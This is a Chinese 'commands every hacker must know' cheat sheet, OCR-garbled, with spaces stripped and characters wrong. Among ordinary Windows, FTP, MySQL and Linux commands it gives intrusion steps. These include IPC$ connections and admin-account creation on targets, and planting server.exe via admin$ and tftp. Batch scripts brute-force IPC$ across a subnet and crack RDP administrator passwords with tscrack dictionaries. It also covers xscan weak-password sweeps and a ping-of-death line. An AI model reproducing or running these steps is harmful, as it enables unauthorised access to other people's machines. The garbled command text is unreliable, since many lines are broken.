黑客必知的DOS命令大全

黑客必知的DOS命令大全!

cmd①

netuseipipc$""/user:""建立IPC空鏈接

netuseipipc$〃密碼〃/user:"用戶名"建立IPC非空鏈接

netuseh:ipc$〃密碼〃/user:〃用戶名〃直接登陸后映射對方C：到本地為H:

netuseh:ipc$登陸后映射對方C：到本地為H:

netuseipipc$/del刪除IPC鏈接

netuseh:/del刪除映射對方到本地的為H:的映射

netuser用戶名密碼/add建立用戶

netuserguest/active:yes激活guest用戶

netuser查看有哪些用戶

netuser帳戶名查看帳戶的屬性

netlocaLGroupadministrators用戶名/add把“用戶”添加到管理員中使其具有管理員

權(quán)限,注意：administrator后加s用復(fù)數(shù)

netstart查看開啟了哪些服務(wù)

netstart服務(wù)名開啟服務(wù)；（如：netstarttelnet,netstartschedule）

netstop服務(wù)名停止某服務(wù)

nettime目標(biāo)ip查看對方時間

nettime目標(biāo)ip/set設(shè)置本地計算機時間與“目標(biāo)IP”主機的時間同步，加上參數(shù)/yes

可取消確認(rèn)信息

netview查看本地局域網(wǎng)內(nèi)開啟了哪些共享

netviewip查看對方局域網(wǎng)內(nèi)開啟了哪些共享

netconfig顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置

netlogoff斷開連接的共享

netpause服務(wù)名暫停某服務(wù)

netsendip”文本信息〃向?qū)Ψ桨l(fā)信息

netver局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息

netshare查看本地開啟的共享

netshareipc$開啟ipc$共享

netshareipc$/del刪除ipc$共享

netsharec$/del刪除C：共享

netuserguest12345用guest用戶登陸后用將密碼改為12345

netpassword密碼更改系統(tǒng)登陸密碼

netstat-a查看開啟了哪些端口，常用netstat-an

netstat-n查看端口的網(wǎng)絡(luò)連接情況，常用netstat-an

netstat-v查看正在進行的工作

netstat-p協(xié)議名例：netstat-ptcq/ip查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情

況）

netstat-s查看正在使用的所有協(xié)議使用情況

nBTstat-Aip對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03

前的為用戶名）-注意：參數(shù)-A要大寫

trAcert-參數(shù)ip（或計算機名）跟蹤路由（數(shù)據(jù)包）,參數(shù)：“r數(shù)字”用于設(shè)置超時間隔。

pingip（或域名）向?qū)Ψ街鳈C發(fā)送默認(rèn)大小為32字節(jié)的數(shù)據(jù)，參數(shù):“-1［空格］數(shù)據(jù)包大小”;

“-n發(fā)送數(shù)據(jù)次數(shù)”；“-t”指一直ping。

ping-t-165550ip死亡之ping（發(fā)送大于64K的文件并一直ping就成了死亡之ping）

ipconfig（winipcfg）用于windowsNT及XP（windows9598）查看本地ip地址，ipconfig

可用參數(shù)“/all”顯示全部配置信息

tlist-t以樹行列表顯示進程（為系統(tǒng)的附加工具，默認(rèn)是沒有安裝的，在安裝目錄的

Support/tools文件夾內(nèi)）

kill-F進程名加-F參數(shù)后強制結(jié)束某進程（為系統(tǒng)的附加工具，默認(rèn)是沒有安裝的，在安

裝目錄的Support/tools文件夾內(nèi)）

del-F文件名加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱

藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的

文件。例如“DEL/AR*.*"表示刪除當(dāng)前目錄下所有只讀文件，“DEL/A-S*.*"表示刪除當(dāng)

前目錄下除系統(tǒng)文件以外的所有文件

del/S/Q目錄或用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和文件。同時

使用參數(shù)/Q可取消刪除操作時的系統(tǒng)確認(rèn)就直接刪除。（二個命令作用相同）

move盤符路徑要移動的文件名存放移動文件的路徑移動后文件名移動文件,用參數(shù)/y將

取消確認(rèn)移動目錄存在相同文件的提示就直接覆蓋

fcone.txttwo.txt>3st.txt對比二個文件并把不同之處輸出到3st.txt文件中，”>"

和“>>"是重定向命令

atid號開啟已注冊的某個計劃任務(wù)

at/delete停止所有計劃任務(wù)，用參數(shù)/yes則不需要確認(rèn)就直接停止

atid號/delete停止某個已注冊的計劃任務(wù)

at查看所有的計劃任務(wù)

atiptime程序名（或一個命令）/r在某時間運行對方某程序并重新啟動計算機

fingerusername?host查看最近有哪些用戶登陸

telnetip端口遠和登陸服務(wù)器，默認(rèn)端口為23

openip連接到IP（屬telnet登陸后的命令）

telnet在本機上直接鍵入telnet將進入本機的telnet

copy路徑文件名1路徑文件名2/y復(fù)制文件1到指定的目錄為文件2,用參數(shù)/y就同時

取消確認(rèn)你要改寫一份現(xiàn)存目錄文件

copyc:srv.exeipadmin$復(fù)制本地c:srv.exe到對方的admin下

cppy1st.jpg/b+2st.txt/a3st.jpg將2st.txt的內(nèi)容藏身到1st.jpg中生成3st.jpg新的

文件，注：2st.txt文件頭要空三排，參數(shù)：/b指二進制文件，/a指ASCLL格式文件

copyipadmin$svv.exec:或：copyipadmin$*.*復(fù)制對方2而1鋸1$共享下的srv.exe文件（所

有文件）至本地C：

xcopy要復(fù)制的文件或目錄樹目標(biāo)地址目錄名復(fù)制文件和目錄樹，用參數(shù)/Y將不提示覆

蓋相同文件

tftp-i自己IP（用肉機作跳板時這用肉機IP）getserver,exec:server,exe登陸后，將

"IP”的server.exe下載到目標(biāo)主機c:server,exe參數(shù)：-i指以二進制模式傳送,如傳送

exe文件時用，如不加-i則以ASCII模式（傳送文本文件模式）進行傳送

tftp-i對方IPputc:server,exe登陸后，上傳本地c:server,exe至主機

ftpip端口用于上傳文件至服務(wù)器或進行文件操作，默認(rèn)端口為21。bin指用二進制方式

傳送（可執(zhí)行文件進）；默認(rèn)為ASCH格式傳送（文本文件時）

routeprint顯示出IP路由，將主要顯示網(wǎng)絡(luò)地址Networkaddres,子網(wǎng)掩碼Netmask,網(wǎng)

關(guān)地址Gatewayaddres,接口地址Interface

arp查看和處理ARP緩存，ARP是名字解析的意思，負(fù)責(zé)把一個IP解析成一個物理性的MAC

地址。arp-a將顯不出全部信息

start程序名或命令/max或/min新開一個新窗口并最大化（最小化）運行某程序或命令

mem查看cpu使用情況

attrib文件名（目錄名）查看某文件（目錄）的屬性

attrib文件名-A-R-S-H或+A+R+S+H去掉（添加）某文件的存檔，只讀，系統(tǒng)，隱

藏屬性；用+則是添加為某屬性

dir查看文件，參數(shù)：/Q顯示文件及目錄屬系統(tǒng)哪個用戶，/T:C顯示文件創(chuàng)建時間，/T:A

顯示文件上次被訪問時間，/T:W上次被修改時間

date/t、time/t使用此參數(shù)即“DATE/T"、“TIME/T”將只顯示當(dāng)前日期和時間,而不必

輸入新II期和時間

set指定環(huán)境變量名稱=要指派給變量的字符設(shè)置環(huán)境變量

set顯示當(dāng)前所有的環(huán)境變量

setp（或其它字符）顯示出當(dāng)前以字符p（或其它字符）開頭的所有環(huán)境變量

pause暫停批處理程序，并顯示出：請按任意鍵繼續(xù)....

if在批處理程序中執(zhí)行條件處理（更多說明見if命令及變量）

goto標(biāo)簽將cmd.exe導(dǎo)向到批處理程序中帶標(biāo)簽的行（標(biāo)簽必須單獨一行，且以冒號打頭，

例如：“：startw標(biāo)簽）

call路徑批處理文件名從批處理程序中調(diào)用另一個批處理程序（更多說明見call/?）

for對一組文件中的每一個文件執(zhí)行某個特定命令（更多說明見for命令及變量）

echoon或off打開或關(guān)閉echo,僅用echo不加參數(shù)則顯示當(dāng)前echo設(shè)置

echo信息在屏幕上顯示出信息

echo信息?pass,txt將"信息"保存到pass.txt文件中

findstr"Hello"aa.txt在aa.txt文件中尋找字符串hello

find文件名查找某文件

title標(biāo)題名字更改CMD窗口標(biāo)題名字

color顏色值設(shè)置cmd控制臺前景和背景顏色；0=黑、1=藍、2=綠、3=淺綠、4=紅、5

=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、8=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮

白

prompt名稱更改cmd.exe的顯示的命令提示符（把C:、D:統(tǒng)一改為：EntSky）

ver在DOS窗口下顯示版本信息

winver彈出一個窗口顯示版本信息（內(nèi)存大小、系統(tǒng)版本、補丁版本、計算機名）

format盤符/FS:類型格式化磁盤,類型:FAT、FAT32,NTFS，例：FormatI）:/FS:NTFS

md目錄名創(chuàng)建目錄

replace源文件要替換文件的目錄替換文件

ren原文件名新文件名重命名文件名

tree以樹形結(jié)構(gòu)顯示出目錄，用參數(shù)-f將列出第個文件夾中文件名稱

type文件名顯示文本文件的內(nèi)容

more文件名逐屏顯示輸出文件

doskey要鎖定的命令=字符

doskey要解鎖命令=為DOS提供的鎖定命令（編輯命令行，重新調(diào)用win2k命令，并創(chuàng)建宏）。

如:鎖定dir命令：doskeydir=entsky（不能用doskeydir=dir）；解鎖：doskeydir=

taskmgr調(diào)出任務(wù)管理器

chkdsk/FD:檢查磁盤D并顯示狀態(tài)報告；加參數(shù)/f并修復(fù)磁盤上的錯誤

tlntadmntelnt服務(wù)admn,健入tlntadmn選擇3,再選擇8,就可以更改telnet服務(wù)默認(rèn)端

口23為其它任何端口

exit退出cmd.exe程序或目前，用參數(shù)/B則是退出當(dāng)前批處理腳本而不是cmd.exe

path路徑可執(zhí)行文件的文件名為可執(zhí)行文件設(shè)置一個路徑。

cmd啟動一個win2K命令解釋窗口。參數(shù)：/eff、/en關(guān)閉、開啟命令擴展；更我詳細(xì)說明

見cmd/?

regedit/s注冊表文件名導(dǎo)入注冊表；參數(shù)/S指安靜模式導(dǎo)入，無任何提示；

regedit/e注冊表文件名導(dǎo)出注冊表

cacls文件名參數(shù)顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數(shù)：/D

用戶名：設(shè)定拒絕某用戶訪問；/P用戶名:perm替換指定用戶的訪問權(quán)限；/G用戶名：perm

賦予指定用戶訪問權(quán)限；Perm可以是：N無，R讀取，W寫入，C更改（寫入），F(xiàn)完全控

制；例：caclsD:est.txt/Dpub設(shè)定d:est.txt拒絕pub用戶訪問。

cacls文件名查看文件的訪問用戶權(quán)限列表

REM文本內(nèi)容在批處理文件中添加注解

netsh查看或更改本地網(wǎng)絡(luò)配置情況

IIS服務(wù)命令：

iisreset/reboot重啟win2k計算機（但有提示系統(tǒng)將重啟信息出現(xiàn)）

iisreset/start或stop啟動（停止）所有Internet服務(wù)

iisreset/restart停止然后重新啟動所有Internet服務(wù)

iisreset/status顯示所有Internet服務(wù)狀態(tài)

iisreset/enable或disable在本地系統(tǒng)上啟用（禁用）Internet服務(wù)的重新啟動

iisreset/rebootonerror當(dāng)啟動、停止或重新啟動Internet服務(wù)時，若發(fā)生錯誤將重新開

機

iisreset/noforce若無法停止Internet服務(wù)，將不會強制終止Internet服務(wù)

iisreset/timeoutVai在到達逾時間（秒）時，仍未停止Internet服務(wù)，若指定

/rebootonerror參數(shù)，則電腦將會重新開機。預(yù)設(shè)值為重新啟動20秒，停止60秒，重新開

機0秒。

FTP命令：（后面有詳細(xì)說明內(nèi)容）

ftp的命令行格式為：

ftp-v-d-i-n—g［主機名］—v顯示遠程服務(wù)器的所有響應(yīng)信息。

-d使用調(diào)試方式。

-n限制ftp的自動登錄，即不使用.netrc文件。

—g取消全局文件名。

help［命令］或？［命令］查看命令說明

bye或quit終止主機FTP進程,并退出FTP管理方式.

pwd列出當(dāng)前遠端主機目錄

put或send本地文件名［上傳到主機上的文件名］將本地一個文件傳送至遠端主機中

get或recv［遠程主機文件名］［下載到本地后的文件名］從遠端主機中傳送至本地主機中

mget[remote-files]從遠端主機接收一批文件至本地主機

mputlocal-files將本地主機中一批文件傳送至遠端主機

dir或Is[remote-directory][local-file]列出當(dāng)前遠端主機目錄中的文件.如果有本地

文件,就將結(jié)果寫至本地文件

ascii設(shè)定以ASCII方式傳送文件（缺省值）

bin或image設(shè)定以二進制方式傳送文件

bell每完成一次文件傳送，報警提示

cdup返回上一級目錄

close中斷與遠程服務(wù)器的ftp會話（與open對應(yīng)）

openhost[port]建立指定ftp服務(wù)器連接，可指定連接端口

delete刪除遠端主機中的文件

mdelete[remote-files]刪除一批文件

mkdirdirectory-name在遠端主機中建立目錄

rename[from][to]改變遠端主機中的文件名

rmdirdirectory-name刪除遠端主機中的目錄

status顯示當(dāng)前FTP的狀態(tài)

system顯示遠端主機系統(tǒng)類型

useruser-name[password][account]重新以別的用戶名登錄遠端主機

openhost[port]重新建立一個新的連接

prompt交互提示模式

macdef定義宏命令

led改變當(dāng)前本地主機的工作目錄，如果缺省，就轉(zhuǎn)到當(dāng)前用戶的HOME目錄

chmod改變遠端主機的文件權(quán)限

case當(dāng)為ON時,用MGET命令拷貝的文件名到本地機器中，全部轉(zhuǎn)換為小寫字母

cdremote-dir進入遠程主機目錄

cdup進入遠程主機目錄的父目錄

!在本地機中執(zhí)行交互shell,exit回到ftp環(huán)境，如！Is*,zip

MYSQL命令：

mysql-h主機地址-u用戶名一p密碼連接MYSQL;如果剛安裝好MYSQL,超級用戶root是

沒有密碼的。

（例：mysql-hllO.110.110.110-Uroot-P123456

注:u與root可以不用加空格，其它也一樣）

exit退出MYSQL

mysqladmin-u用戶名-p舊密碼password新密碼修改密碼

grantselecton數(shù)據(jù)庫.*to用戶名@登錄主機identifiedby〃密碼〃；增加新用戶。（注

意：和上面不同，下面的因為是MYSQL環(huán)境中的命令，所以后面都帶一個分號作為命令結(jié)束

符）

showdatabases;顯示數(shù)據(jù)庫列表。剛開始時才兩個數(shù)據(jù)庫:mysql和test。mysql庫很重

要它里面有MYSQL的系統(tǒng)信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。

usemysql；

showtables;顯示庫中的數(shù)據(jù)表

describe表名；顯示數(shù)據(jù)表的結(jié)構(gòu)

createdatabase庫名；建庫

use庫名;

createtable表名（字段設(shè)定列表）；建表

dropdatabase庫名;

droptable表名；刪庫和刪表

deletefrom表名；將表中記錄清空

select*from表名；顯示表中的記錄

mysqldump-optschool>school.bbb備份數(shù)據(jù)庫:（命令在DOS的mysqlin目錄下執(zhí)行）;

注釋:將數(shù)據(jù)庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，

打開看看你會有新發(fā)現(xiàn)。

win2003系統(tǒng)下新增命令（實用部份）：

shutdown/參數(shù)關(guān)閉或重啟本地或遠程主機。

參數(shù)說明：/S關(guān)閉主機，/R重啟主機，/T數(shù)字設(shè)定延時的時間，范圍0?180秒之間，/A

取消開機，/M//IP指定的遠程主機。

例：shutdown/r/t0立即重啟本地主機（無延時）

taskill/參數(shù)進程名或進程的pid終止一個或多個任務(wù)和進程。

參數(shù)說明：/PID要終止進程的pid,可用tasklist命令獲得各進程的pid,/1M要終止的進

程的進程名，/F強制終止進程，/T終止指定的進程及他所啟動的子進程.

tasklist顯示當(dāng)前運行在本地和遠程主機上的進程、服務(wù)、服務(wù)各進程的進程標(biāo)識符（PID）。

參數(shù)說明：/M列出當(dāng)前進程加載的dll文件，/SVC顯示出每個進程對應(yīng)的服務(wù)，無參數(shù)時

就只列出當(dāng)前的進程。

Linux系統(tǒng)下基本命令：要區(qū)分大小寫

uname顯示版本信息（同win2K的ver）

dir顯示當(dāng)前目錄文件，Is-al顯示包括隱藏文件（同win2K的dir）

pwd查詢當(dāng)前所在的目錄位置

cdcd..回到上一層目錄，注意cd與..之間有空格。cd/返回到根目錄。

cat文件名查看文件內(nèi)容

cat>abc.txt往abc.txt文件中寫上內(nèi)容。

more文件名以一頁一頁的方式顯示一個文本文件。

cp復(fù)制文件

mv移動文件

rm文件名刪除文件，rm-a目錄名刪除目錄及子目錄

mkdir目錄名建立目錄

rmdir刪除子目錄，目錄內(nèi)沒有文檔。

chmod設(shè)定檔案或目錄的存取權(quán)限

grep在檔案中查找字符串

diff檔案文件比較

find檔案搜尋

date現(xiàn)在的日期、時間

who查詢目前和你使用同■■臺機器的人以及Login時間地點

w查詢目前上機者的詳細(xì)資料

whoami查看自己的帳號名稱

groups查看某人的Group

passwd更改密碼

history查看自己下過的命令

ps顯示進程狀態(tài)

kill停止某進程

gcc黑客通常用它來編譯C語言寫的文件

su權(quán)限轉(zhuǎn)換為指定使用者

telnetIPtelnet連接對方主機（同win2K）,當(dāng)出現(xiàn)bash$時就說明連接成功。

ftpftp連接上某服務(wù)器（同win2K）

計算機運行命令全集winver--------檢查Windows版本

wmimgmt.msc---打開windows管理體系結(jié)構(gòu)

wupdmgr-------windows更新程序

winver--------檢查Windows版本

wmimgmt.msc---打開windows管理體系結(jié)構(gòu)

wupdmgr-------windows更新程序

wwww-------windows腳本宿主設(shè)置

write---------寫字板winmsd-----系統(tǒng)信息

wiaacmgr------掃描儀和照相機向?qū)?/p>

winchat-------XP自帶局域網(wǎng)聊天

mem.exe-------顯示內(nèi)存使用情況

Msconfig.exe—系統(tǒng)配置實用程序

mplayer2------簡易widnowsmediaplayer

mspaint-------畫圖板

mstsc---------遠程桌面連接

mplayer2------媒體播放機

magnify-------放大鏡實用程序

mmc------------打開控制臺

mobsync-------同步命令

dxdiag--------檢查directx信息

drwtsn32------系統(tǒng)醫(yī)生

devmgmt.msc—設(shè)備管理器

dfrg.msc------磁盤碎片整理程序

diskmgmt,msc--磁盤管理實用程序

deomenfg------打開系統(tǒng)組件服務(wù)

ddeshare------打開DDE共享設(shè)置

dvdplay-------DVD播放器

netstopmessenger----停止信使服務(wù)

netstartmessenger---開始信使服務(wù)

notepad-------打開記事本

nslookup------網(wǎng)絡(luò)管理的工具向?qū)?/p>

ntbackup------系統(tǒng)備份和還原

narrator------屏幕〃講述人〃

ntmsmgr.msc---移動存儲管理器

ntmsoprq.msc--移動存儲管理員操作請求

netstat-an---（TC）命令檢查接口

syncapp-------創(chuàng)建一個公文包

sysedit-------系統(tǒng)配置編輯器

sigverif------文件簽名驗證程序

sndrec32------錄音機

shrpubw-------創(chuàng)建共享文件夾

secpol.msc----本地安全策略

syskey--------系統(tǒng)加密，一旦加密就不能解開，保護windowsxp系統(tǒng)的雙重密碼

services,msc---本地服務(wù)設(shè)置

Sndvol32------音量控制程序

sfc.exe-------系統(tǒng)文件檢查器

sfc/scannow—windows文件保護

tsshutdn------60秒倒計時關(guān)機命令

tourstart-----xp簡介（安裝完成后出現(xiàn)的漫游xp程序）

taskmgr-------任務(wù)管理器

eventvwr------事件查看器

eudcedit------造字程序

explorer------打開資源管理器

packager------對象包裝程序

perfmon.msc---計算機性能監(jiān)測程序

progman--------程序管理器

regedit,exe---注冊表

rsop.msc-------組策略結(jié)果集

regedt32-------注冊表編輯器

rononce-p---15秒關(guān)機

regsvr32/u*.dll----停止dll文件運行

regsvr32/uzipfldr.dll------取消ZIP支持

cmd.exe-------CMD命令提示符

chkdsk.exe----Chkdsk磁盤檢查

certmgr.msc---證書管理實用程序

calc----------啟動計算器

charmap-------啟動字符映射表

cliconfg------SQLSERVER客戶端網(wǎng)絡(luò)實用程序

Clipbrd-------剪貼板查看器

conf----------啟動netmeeting

compmgmt,msc---計算機管理

c1eanmgr------**整理

ciadv.msc-----索引服務(wù)程序

osk-----------打開屏幕鍵盤

odbcad32------ODBC數(shù)據(jù)源管理器

oobe/msoobe/a---檢查XP是否激活

lusrmgr.msc---本機用戶和組

logoff--------注銷命令

iexpress------木馬捆綁工具，系統(tǒng)自帶

Nslookup------IP地址偵測器

fsmgmt.msc----共享文件夾管理器

utilman-------輔助工具管理器

gpedit.msc----組策略

批處理命令與變量

1：for命令及變量基本格式：

FOR/參數(shù)%variableIN(set)DOcommand[command_parameters]%variable:指定一個單

一字母可替換的參數(shù)，如：%i,而指定一個變量則用：%%i,而調(diào)用變量時用：%i%,變量

是區(qū)分大小寫的(而不等于%Do

批處理每次能處理的變量從%0—%9共10個，其中%0默認(rèn)給批處理文件名使用，％1默認(rèn)為使

用此批處理時輸入的的第一個值，同理:％2—%9指輸入的第2-9個值;例：netuseipipc$pass

/user:user中ip為%1,pass為％2,user為%3

(set):指定一個或一組文件,可使用通配符,如:(D:user.txt)和(11254)(1-1254),{^(1

1254)”第一個〃1〃指起始值，第二個〃1〃指增長量，第三個〃254〃指結(jié)束值，BU：從1到254；

“(1-1254)”說明：即從254到1}

command：指定對第個文件執(zhí)行的命令，如：netuse命令；如要執(zhí)行多個命令時，命令這間

加：&來隔開

commandparameters：為特定命令指定參數(shù)或命令行開關(guān)

IN(set)：指在(set)中取值;DOcommand：指執(zhí)行command

參數(shù)：/L指用增量形式{(set)為增量形式時}；/F指從文件中不斷取值，直到取完為止

{(set)為文件時，如(d:pass,txt)時}。

用法舉例：

@echooff

echo用法格式：test,bat*.*.*>test,txt

for/L%%Gin(11254)doecho%1.%%G?test.txt&netuse%1.%%G/user:administrator

Ifind〃命令成功完成〃?test.txt

存為test,bat說明：對指定的一個C類網(wǎng)段的254個IP依次試建立administrator密碼為

空的IPC$連接，如果成功就把該1P存在test,txt中。

/L指用增量形式(即從1-254或254T)；輸入的IP前面三位:*.*.*為批處理默認(rèn)的%1；%%G

為變量(ip的最后一位)；&用來隔開echo和netuse這二個命令；|指建立了ipc$后，在

結(jié)果中用find查看是否有〃命令成功完成〃信息；％1.%%G為完整的IP地址；(11254)指起

始值，增長量，結(jié)止值。

?echooff

echo用法格式：ok.batip

FOR/F%%iIN(D:user.die)DOsmb.exe%1%%iD:pass.die200

存為：ok.exe說明：輸入一個IP后，用字典文件d:pass.die來暴解d:user.die中的用戶

密碼，直到文件中值取完為止。％%i為用戶名；％1為輸入的IP地址(默認(rèn))。

七：

2：if命令及變量基本格式：

IF[not]errorlevel數(shù)字命令語句如果程序運行最后返回一個等于或大于指定數(shù)字的退

出編碼，指定條件為“真二

例：IFerrorlevel0命令指程序執(zhí)行后返回的值為0時，就值行后面的命令；IFnot

errorlevel1命令指程序執(zhí)行最后返回的值不等于1,就執(zhí)行后面的命令。

0指發(fā)現(xiàn)并成功執(zhí)行（真）；1指沒有發(fā)現(xiàn)、沒執(zhí)行（假）。

IF[not]字符串1==字符串2命令語句如果指定的文本字符串匹配（即：字符串1等于字

符串2）,就執(zhí)行后面的命令。

例：“if"%2曠=="4"gotostart”指：如果輸入的第二個變量為4時，執(zhí)行后面的命令（注

意：調(diào)用變量時就%變量名％并加"

IF[not]exist文件名命令語句如果指定的文件名存在，就執(zhí)行后面的命令。

例："ifnotnc.exegotoend”指：如果沒有發(fā)現(xiàn)nc.exe文件就跳到"：end”標(biāo)簽處。

IF[not]errorlevel數(shù)字命令語句else命令語句或IF[not]字符串1==字符串2命令

語句else命令語句或IF[not]exist文件名命令語句else命令語句加上：else命令

語句后指：當(dāng)前面的條件不成立時，就指行else后面的命令。注意：else必須與if在同

一行才有效。當(dāng)有del命令時需把del命令全部內(nèi)容用＜＞括起來，因為del命令要單獨一

行時才能執(zhí)行，用上＜＞后就等于是單獨一行了；例如："ifexisttest.txt.elseecho

test.txt.missing",注意命令中的"

終端服務(wù)密碼破解tscrack:

參數(shù)說明

-h顯示使用幫助

-v顯示版本信息

-s在屏幕上打出解密能力

-b密碼錯誤時發(fā)出的聲音

-t同是發(fā)出多個連接（多線程）

-NPreventSystemLogentriesontargetedserver

-U卸載移除tscrack組件

-f使用一f后面的密碼

-F間隔時間（頻率）

-1使用一1后面的用戶名

-w使用一w后面的密碼字典

-p使用一p后面的密碼

-D登錄主頁面

用法示例

tscrack192.168.0.1-1administrator-wpass,die遠程用密碼字典文件暴破主機的

administrator的登陸密碼

tscrack192.168.0.1-1administrator-p123456用密碼123456遠程登陸192.168.0.1

的administrator用戶

@ifnotexistipcscan.txtgotonosean

?for/ftokens=ldelims="%%iin（3389.txt）docallhack,bat%%i

nscan

?echo3389.txtnofindorscanfaild

（①存為3389.bat）（假設(shè)現(xiàn)有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列

表文件3389.txt）

3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack,bat

@ifnotexisttscrack.exegotonosean

?tscrack%1-1administrator-wpass,die?rouji.txt

:nosean

?echotscrack.exenofindorscanfaild

（②存為hack,bat）（運行3389.bat就OK,且3389.bat,hack.bat..3389.txt＞pass,die

與tscrack.exe在同一個目錄下；就可以等待結(jié)果了）

hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密

碼，并將破解結(jié)果保存在rouji.txt文件中。

掃描工具：xscan

基本格式

xscan-host〈起始IP＞［Y終止IP＞］＜檢測項目》［其他選項］掃錨”起始IP到終止IP"段的

所有主機信息

xscan-file〈主機列表文件名〉（檢測項目》［其他選項］掃錨〃主機IP列表文件名”中的所

有主機信息

檢測項目

-active檢測主機是否存活

-os檢測遠程操作系統(tǒng)類型（通過NETBIOS和ISNMP協(xié)議）

-port檢測常用服務(wù)的端口狀態(tài)

-ftp檢測FTP弱口令

-pub檢測FTP服務(wù)匿名用戶寫權(quán)限

-pop3檢測P0P3-Server弱口令

-smtp檢測SMTP-Server漏洞

-sql檢測SQL-Server弱口令

-smb檢測NT-Server弱口令

-iis檢測IIS編碼/解碼漏洞

-cgi檢測CGI漏洞

-nasi加載Nessus攻擊腳本

-all檢測以上所有項目

其它選項

-i適配器編號設(shè)置網(wǎng)絡(luò)適配器，〈適配器編號）可通過參數(shù)獲取

-1顯示所有網(wǎng)絡(luò)適配器

-v顯示詳細(xì)掃描進度

-P跳過沒有響應(yīng)的主機

-0跳過沒有檢測到開放端口的主機

-t并發(fā)線程數(shù)量，并發(fā)主機數(shù)量指定最大并發(fā)線程數(shù)量和并發(fā)主機數(shù)量，默認(rèn)數(shù)量為

100,10

-log文件名指定掃描報告文件名（后綴為：TXT或HTML格式的文件）

用法示例

xscan-host192.168.1.1-192.168.255.255-al1-active-p檢測

192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機的所有漏洞，跳過無響應(yīng)的主機

xscan-host192.168.1.1-192.168.255.255-port-smb-t150-o檢測

192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機的標(biāo)準(zhǔn)端口狀態(tài)，NT弱口令用戶,最大并發(fā)線程

數(shù)量為150,跳過沒有檢測到開放端口的主機

xscan-filehostlist,txt-port-cgi-t200,5-v-o檢測“hostlist,txt”文件中列出

的所有主機的標(biāo)準(zhǔn)端口狀態(tài)，CGI漏洞，最大并發(fā)線程數(shù)量為200,同一時刻最多檢測5臺主

機，顯示詳細(xì)檢測進度，跳過沒有檢測到開放端口的主機

FTP命令是Internet用戶使用最頻繁的命令之一，熟悉并靈活應(yīng)用FTP的內(nèi)部命令，可以大

大方便使用者，并收到事半功倍之效。如果你想學(xué)習(xí)使用進行后臺FTP下載，那么就必須學(xué)

習(xí)FTP指令。

FTP的命令行格式為：

ftp-v-d-i-n-g[主機名],其中

-v顯示遠程服務(wù)器的所有響應(yīng)信息

-n限制ftp的自動登錄，即不使用；.netrc文件：

-d使用調(diào)試方式；

-g取消全局文件名。

FTP使用的內(nèi)部命令如下（中括號表示可選項）：

1.![cmd[args]]：在本地機中執(zhí)行交互shell,exit回到ftp環(huán)境,如：！ls*.zip

2.$macro-ame[args]：執(zhí)行宏定義macro-name。

3.account[password]：提供登錄遠程系統(tǒng)成功后訪問系統(tǒng)資源所需的補充口令。

4.appendlocal-file[remote-file]：將本地文件追加到遠程系統(tǒng)主機，若未指定遠程系統(tǒng)

文件名，則使用本地文件名。

5.ascii：使用ascii類型傳輸方式。

6.bell：每個命令執(zhí)行完畢后計算機響鈴一次。

7.bin：使用二進制文件傳輸方式。

8.bye：退出ftp會話過程。

9.case：在使用mget時，將遠程主機文件名中的大寫轉(zhuǎn)為小寫字母。

10.cdremote-dir：進入遠程主機目錄。

ll.cdup：進入遠程主機目錄的父目錄。

12.chmodmodefile-name：將遠程主機文件file-name的存取方式設(shè)置為mode,如：chmod

777a.out.

13.close：中斷與遠程服務(wù)器的ftp會話（與open對應(yīng)）。

14.cr：使用asscii方式傳輸文件時，將回車換行轉(zhuǎn)換為回行。

15.deleteremote-file：刪除遠程主機文件。

16.debug[debug-value]：設(shè)置調(diào)試方式，顯示發(fā)送至遠程主機的每條命令，如：debup3,

若設(shè)為0,表示取消debug。

17.dir[remote-dir][local-file]：顯示遠程主機目錄，并將結(jié)果存入本地文件。

18.disconNECtion：同close。

19.formformat：將文件傳輸方式設(shè)置為format,缺省為file方式。

20.getremote-file[local-file]：將遠程主機的文件remote-file傳至本地硬盤的

local-file。

21.glob：設(shè)置mdelete,mget,mput的文件名擴展，缺省時不擴展文件名，同命令行的-g

參數(shù)。

22.hash：每傳輸1024字節(jié)，顯示一個hash符號（#）。

23.help[cmd]：顯示ftp內(nèi)部命令cmd的幫助信息,如：helpgeto

24.idle[seconds]：將遠程服務(wù)器的休眠計時器設(shè)為[seconds]秒。

25.image：設(shè)置二進制傳輸方式（同binary）o

26.led[dir]：將本地工作目錄切換至dir。

27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir,并存入本地文件local-file。

28.macdefmacro-name：定義一個宏，遇到macdef下的空行時，宏定義結(jié)束。

29.mdelete[remote-file]：刪除遠程主機文件。

30.mdirremote-fileslocal-file：與dir類似，但可指定多個遠程文件，如：mdir

*.o.*.zipoutfile。

31.mgetremote-files：傳輸多個遠程文件。

32.mkdirdir-name：在遠程主機中建一目錄。

33.misremote-filelocal-file：同nlist,但可指定多個文件名。

34.mode[modename]：將文件傳輸方式設(shè)置為modename,缺省為stream方式。

35.modtimefile-name：顯示遠程主機文件的最后修改時間。

36.mputlocal-file：將多個文件傳輸至遠程主機。

37.newerfile-name：如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，

則重傳該文件。

38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單,并存入本地硬盤的

local-file。

39.nmap[inpatternoutpattern]：設(shè)置文件名映射機制，使得文件傳輸時，文件中的某些

字符相互轉(zhuǎn)換，如：nmap$1.$2.$3[$1,$2].[$2,$3],則傳輸文件al.a2.a3時,文件名

變?yōu)閍l,a2o該命令特別適用于遠程主機為非UNIX機的情況。

